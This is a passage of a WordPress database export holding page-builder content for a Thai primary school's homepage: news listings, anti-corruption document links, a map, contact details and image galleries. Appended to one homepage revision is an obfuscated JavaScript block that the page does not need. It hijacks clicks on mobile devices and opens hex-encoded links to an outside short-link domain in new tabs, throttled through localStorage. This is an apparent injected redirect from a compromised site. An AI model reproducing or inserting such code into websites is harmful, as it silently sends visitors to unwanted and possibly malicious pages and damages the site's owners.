style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 21:35:00','2024-08-07 14:35:00','',14,'http://pakhaeng.ssk.in.th/?p=665',0,'revision','',0),
(666,1,'2024-08-07 21:38:35','2024-08-07 14:38:35','','ปขก2','','inherit','','closed','','%e0%b8%9b%e0%b8%82%e0%b8%812','','','2024-08-07 21:38:35','2024-08-07 14:38:35','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png',0,'attachment','image/png',0),
(667,1,'2024-08-07 21:38:45','2024-08-07 14:38:45','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"thumbSize\":\"full\",\"ids\":[660,661,666],\"type\":\"slider\",\"imageRatio\":\"land169\",\"imagesDynamic\":[{\"id\":660,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=660\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก1-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก1-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก1-1.png\",\"width\":1500,\"height\":600},{\"id\":661,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=661\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก.png\",\"width\":1500,\"height\":600},{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%